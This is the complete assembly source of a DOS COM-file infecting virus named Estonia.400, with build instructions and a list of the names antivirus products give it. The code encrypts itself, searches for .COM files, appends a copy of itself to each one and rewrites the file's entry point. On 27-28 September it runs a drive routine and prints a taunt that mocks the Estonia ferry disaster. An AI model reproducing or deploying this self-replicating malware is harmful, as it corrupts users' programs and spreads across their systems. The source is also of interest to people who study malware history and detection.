
  1. ;------------------------------------------------------------------------------- 
  2. ;---------------------- ESTONIA.ASM
  3. ;------------------------------------------------------------------------------- 
  4. ;---- VMAKE LINE: TASM $ /t 
  5. ;---- VMAKE LINE: TLINK $ /x /t 
  6. ;---- VMAKE LINE: ERASE $.OBJ 
  7. ;---- VMAKE LINE: ENDPROC 
  8. ;---- Compiled & Linked this will scan as the following:  
  9. ;------------------------------------------------------------------------------- 
  10. ;---- McAfee  = ESTONIA.400
  11. ;---- F-Prot  = Estonia.400 - Generation 1
  12. ;---- Avast   = Estonia.400
  13. ;---- AVPlite = ES.400
  14. ;---- DrSol   = Estonia.400
  15. ;---- TBScan  = Estionia.400
  16. ;---- Norton  = VLAD.Estonia.400
  17. ;---- Sweep   = ES-400
  18. ;------------------------------------------------------------------------------- 
  19. ;---- God pops up in the strangest places, eh?  
  20. ;----  Jesus loves YOU and died so that you can live forever 
  21. ;----  in heaven with God.  Believe in Him and when you die  
  22. ;----  you will not be dead forever!  
  23. ;------------------------------------------------------------------------------- 
  24.  
  25. ;                      D   A   R   K   M   A   N
  26. ;                           Proudly Presents
  27. ;                      E   S   T   O   N   I   A
  28.  
  29. psp          equ     100h
  30. virussize    equ     extracopy - code
  31. cryptsize    equ     extracopy - crypted - 01h
  32. dtaoffset    equ     02h * virussize + psp
  33. filetime     equ     dtaoffset + 16h
  34. filedate     equ     dtaoffset + 18h
  35. filesize     equ     dtaoffset + 1ah
  36. filename     equ     dtaoffset + 1eh
  37. memsize      equ     dtaoffset + 2bh
  38.  
  39. estonia      segment
  40.              assume  cs:estonia,ds:estonia,es:estonia
  41.              org     100h                ; Origin of COM-file
  42.  
  43. code:
  44.              call    viruscode
  45. virusid      db      'ES'                ; Estonia Scan-ID
  46.  
  47. viruscode:
  48.              pop     bp                  ; Load BP from stack
  49.              sub     bp,offset virusid   ; BP = delta offset
  50.  
  51.              or      bp,bp               ; BP = 0?
  52.              je      crypted             ; Equal? Jump to crypted
  53.              std                         ; Set direction flag
  54.              lea     bx,[bp+crypted]     ; AX = offset encrypted code
  55.              mov     cx,02h              ; Transpose 2 times
  56.              mov     dx,cryptsize        ; Decrypt 350 bytes
  57. denexttime:
  58.              push    cx                  ; Save CX at stack
  59.              mov     cx,dx               ; CX = size of encrypted code
  60.              mov     di,bx
  61.              add     di,dx               ; DI = offset of last encrypted code
  62.              mov     si,di               ; SI = offset of last encrypted code
  63.              lodsb                       ; Load last plain byte
  64.              sub     [bx],al             ; Subtract AL from first encrypt byte
  65. denextbyte:
  66.              lodsw                       ; Load 2 encrypted bytes
  67.              sub     ah,al               ; Subtract AL from AH
  68.              mov     al,ah               ; AL = decrypted byte
  69.              stosb                       ; Store a decrypted byte
  70.              inc     si                  ; Increase SI
  71.              loop    denextbyte
  72.              pop     cx                  ; Load CX from stack
  73.              loop    denexttime
  74. crypted:
  75.              cld                         ; Clear direction flag
  76.              mov     ah,2ah              ; Get system date
  77.              int     21h                 ; Do it!
  78.              cmp     dx,091bh            ; 27. September?
  79.              jb      dontsink            ; Below? Jump to dontsink
  80.              cmp     dx,091ch            ; 28. September?
  81.              ja      dontsink            ; Above? Jump to dontsink
  82.  
  83.              xor     al,al               ; Clear AL
  84.              mov     cx,19h              ; Destroy drives A-Z
  85. formattrack:
  86.              push    cx                  ; Save CX at stack
  87.              mov     ah,2                ; Read a track
  88.              xor     cx,cx               ; Clear CX
  89.              xor     dh,dh               ; Clear DH
  90.              mov     dl,al
  91.              int     13h                 ; Do it! (disk)
  92.              inc     al                  ; Increase AL
  93.              pop     cx                  ; Load CX from stack
  94.              loop    formattrack
  95.  
  96.              mov     ah,09h              ; Standard output string
  97.              lea     dx,message          ; DX = offset of message
  98.              int     21h                 ; Do it!
  99.              
  100.              int     20h                 ; Exit to DOS!
  101. dontsink:
  102.              mov     ah,4ah              ; Modify memory allocation
  103.              mov     bx,1000h            ; The new block size is 65535 bytes
  104.              int     21h                 ; Do it!
  105.              jc      virusexit           ; Error? Jump to vitusexit
  106.  
  107.              mov     ah,1ah              ; Set disk transfer address
  108.              lea     dx,[bp+dtaoffset]   ; DX = offset of new DTA
  109.              int     21h                 ; Do it!
  110.  
  111.              mov     ah,4eh              ; Find first matching file
  112.              mov     cx,22h              ; File attribute hidden+archive
  113.              lea     dx,[bp+filespec]    ; DX = offset of filespec
  114. findnext:
  115.              int     21h                 ; Do it!
  116.              jnc     infect              ; No error? Jump to infect
  117. virusexit:
  118.              mov     ah,1ah              ; Set disk transfer address
  119.              mov     dx,80h              ; DX = offset of default DTA
  120.              int     21h                 ; Do it!
  121.  
  122.              mov     di,100h             ; DI = beginning of code
  123.              lea     si,[bp+realcode]    ; SI = offset of realcode
  124.              push    di                  ; Restore Instruction Pointer (IP)
  125.              movsw                       ; Move the real code to the beginning
  126.              movsw                       ;  "    "   "    "   "   "      "
  127.              movsb                       ;  "    "   "    "   "   "      "
  128.              ret                         ; Return!
  129. setfileinfo:
  130.              mov     cx,[bp+filetime]    ; CX = file time in DTA
  131.              mov     dx,[bp+filedate]    ; DX = file date in DTA
  132.              mov     ax,5701h            ; Set file data and time
  133.              int     21h                 ; Do it!
  134. closefile:
  135.              mov     ah,3eh              ; Close file
  136.              int     21h                 ; Do it!
  137.              mov     ah,4fh              ; Find next matching file
  138.              jmp     short findnext
  139. infect:
  140.              mov     cx,virussize        ; Move 400 bytes
  141.              lea     di,[bp+extracopy]   ; DI = offset of extracopy
  142.              lea     si,[bp+code]        ; SI = offset of code
  143.              rep     movsb               ; Create an extra copy of virus
  144.  
  145.              mov     ax,3d02h            ; Open file (read/write)
  146.              lea     dx,[bp+filename]    ; DX = offset of filename in DTA
  147.              int     21h                 ; Do it!
  148.              jc      closefile           ; Error? Jump to closefile
  149.              xchg    ax,bx               ; Exchange AX with BX
  150.  
  151.              mov     ax,word ptr [bp+filesize]
  152.              cmp     ax,05h              ; AX = 5? (AX < 5)
  153.              jb      closefile           ; Less? Jump to closefile
  154.              cmp     ax,(65535-memsize)  ; AX = 64432? (AX > 64432)
  155.              ja      closefile           ; Greater? Jump to closefile
  156.  
  157.              sub     ax,03h              ; AX = offset of virus code
  158.              mov     [bp+offset estoniacode+01h],ax
  159.  
  160.              mov     ah,3fh              ; Read from file
  161.              mov     cx,05h              ; Read 5 bytes
  162.              lea     dx,[bp+virussize+realcode]
  163.              int     21h                 ; Do it!
  164.  
  165.              cmp     [bp+virussize+offset realcode+03h],'SE'
  166.              je      closefile           ; Infected? Jump to closefile
  167.  
  168.              lea     di,[bp+virussize+cryptvalues]
  169.              in      ax,40h              ; AX = port 40h
  170.              stosw                       ; Store AX in crypt values
  171.              in      ax,40h              ; AX = port 40h
  172.              stosw                       ; Store AX in crypt value
  173.  
  174.              push    bx                  ; Save BX at stack
  175.              lea     bx,[bp+virussize+crypted]
  176.              mov     cx,02h              ; Transpose 2 times
  177.              mov     dx,cryptsize        ; Encrypt 350 bytes
  178. ennexttime:
  179.              push    cx                  ; Save CX at stack
  180.              mov     cx,dx               ; CX = size of plain code
  181.              mov     di,bx               ; DI = offset of plain code
  182.              mov     si,bx               ; SI = offset of plain code
  183.              inc     di                  ; Increase DI
  184. ennextbyte:
  185.              lodsw                       ; Load 2 plain bytes
  186.              add     al,ah               ; Add AH to AL
  187.              stosb                       ; Store a encrypted byte
  188.              dec     si                  ; Decrease SI
  189.              loop    ennextbyte
  190.              add     [bx],al             ; Add AL to plain byte
  191.              pop     cx                  ; Load CX from stack
  192.              loop    ennexttime
  193.              pop     bx                  ; Load BX from stack
  194.  
  195.              mov     ax,4202h            ; Move file pointer to the end
  196.              xor     cx,cx               ; Clear CX
  197.              cwd                         ; Convert word to doubleword
  198.              int     21h                 ; Do it!
  199.  
  200.              mov     ah,40h              ; Write to file
  201.              mov     cx,virussize        ; Write 400 bytes
  202.              lea     dx,[bp+extracopy]   ; DX = offset of extracopy
  203.              int     21h                 ; Do it!
  204.              cmp     ax,cx               ; Disk full?
  205.              jne     infectdone          ; Error? Jump to infectdone
  206.  
  207.              mov     ax,4200h            ; Move file pointer to the beginning
  208.              xor     cx,cx               ; Clear CX
  209.              cwd                         ; Convert word to doubleword
  210.              int     21h                 ; Do it!
  211.  
  212.              mov     ah,40h              ; Write to file
  213.              mov     cx,05h              ; Write 5 bytes
  214.              lea     dx,[bp+estoniacode] ; DX = offset of estoniacode
  215.              int     21h                 ; Do it!
  216. infectdone:
  217.              jmp     setfileinfo
  218.  
  219. cryptvalues  db      04h dup(?)          ; Cryption values
  220. estoniacode  db      0e8h,00h,00h,'ES'   ; New code of infected file
  221. realcode     db      0cdh,20h            ; Real code of infected file
  222.              db      03h dup(?)
  223. filespec     db      '*.COM',00h         ; File specification
  224. message      db      'Your drives were ' ; This message will be shown the
  225.              db      'on the Estonia...' ; 27 / 28. September and then the
  226.              db      ' They DIDN''T sur' ; drives (A-Z) bootsector will
  227.              db      'vive!!!',0dh,0ah   ; look like it is being destroyed!!!
  228.              db      '$'
  229. extracopy:
  230.  
  231. estonia      ends
  232. end          code
  233.